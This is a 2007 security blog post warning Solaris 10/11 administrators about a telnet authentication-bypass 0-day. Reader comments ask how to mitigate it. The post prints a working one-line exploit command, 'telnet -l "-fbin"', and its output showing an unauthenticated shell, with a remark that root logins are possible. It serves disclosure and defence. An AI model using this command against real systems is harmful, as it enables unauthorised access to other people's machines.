02.11.07

One more reason not to run telnet or Solaris 0-day == Trouble

Posted in Exploits, IT, Security, Vulnerabilities at 3:24 am by Tyler Reguly

We've all heard it before... Don't run telnet because it's a plain text protocol, it's an inherent security risk... Which is true, SSH just makes more sense and plenty of people are using SSH these days. This doesn't mean that everyone is though, so... *ATTENTION SOLARIS ADMINS** If you're still running telnet on Solaris 10 or 11 (SunOS 5.10 or 5.11)... Turn it off. An email was released on Full Disclosure earlier with a new 0-day for Solaris 10/11 that's so easy it makes my skin crawl. This pdf was linked in the email which gives details and a small shell script to perform the exploit. It seemed surprising that this existed and had not been previously found, so of course I had to try it out.

C:\Documents and Settings\treguly>telnet -l "-fbin" X.X.X.X

Last login: Sun Feb 11 00:24:44 from XXXX
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$

The result is more than a little frightening...

A Hat Tip for this goes to Maynor and the Errata Security Blog for informing me of this issue.

[UPDATE] While it was initially rumoured that this didn't affect the root account, this is not the case... root logins are possible... it is dependent on configuration. More info on the nCircle Blog.

Social bookmark this page

5 Comments »

  1. johnm said,

    February 14, 2007 at 6:35 am

    hi there,

    I have a sunos 5.10 box at my work. I real newbie in sunos so i really need your help … can you please tell me how to close telnet or if there is a patch for this vuln.

    thx

  2. Tyler Reguly said,

    February 14, 2007 at 4:55 pm

    You can disable telnet with the command: svcadm disable telnet

    There was an interim patch available from Sun but when I pull the page up now it seems to be gone, perhaps they’ve issued a full patch.. but I’m not sure where it is located.

  3. johnm said,

    February 15, 2007 at 6:50 am

    thx a lot . if you find the patch pls paste the link here thanks

  4. johnm said,

    February 15, 2007 at 6:54 am

    COIS# svcadm disable telnet
    svcadm: not found
    COIS#

  5. The Current Truth said,

    March 23, 2007 at 10:36 pm

    [...] Here are some insightful posts and verification of the various capabilities of the exploit. Errata Security Computer Defense [...]

Leave a Comment